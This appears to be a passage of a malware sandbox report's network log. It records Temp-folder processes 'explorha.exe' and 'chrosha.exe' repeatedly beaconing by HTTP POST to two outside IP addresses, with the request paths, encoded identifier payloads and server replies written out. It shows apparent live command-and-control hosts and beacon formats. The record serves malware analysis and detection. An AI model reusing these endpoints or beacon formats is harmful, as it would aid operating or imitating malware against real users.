                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      282192.168.2.550124193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:16.213439941 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:16.458899975 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      283192.168.2.550125193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:16.527877092 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:16.778974056 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      284192.168.2.550126193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:16.713920116 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:16.967158079 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      285192.168.2.550127193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:17.035180092 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:17.291246891 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      286192.168.2.550128193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:17.326524973 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:17.574265957 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      287192.168.2.550129193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:17.652471066 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:17.899439096 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      288192.168.2.550130193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:17.823016882 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:18.070862055 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      289192.168.2.550131193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:18.151197910 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:18.399919987 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      290192.168.2.550132193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:18.433042049 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:18.680342913 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      291192.168.2.550133193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:18.755290985 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:18.997711897 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      292192.168.2.550134193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:18.926899910 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:19.173882961 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      293192.168.2.550135193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:19.246440887 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:19.495146990 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      294192.168.2.550136193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:19.540589094 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:19.788249016 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      295192.168.2.550137193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:19.855314016 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:20.103374004 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      296192.168.2.550138193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:20.032421112 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:20.276448965 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      297192.168.2.550139193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:20.352876902 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:20.603303909 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      298192.168.2.550140193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
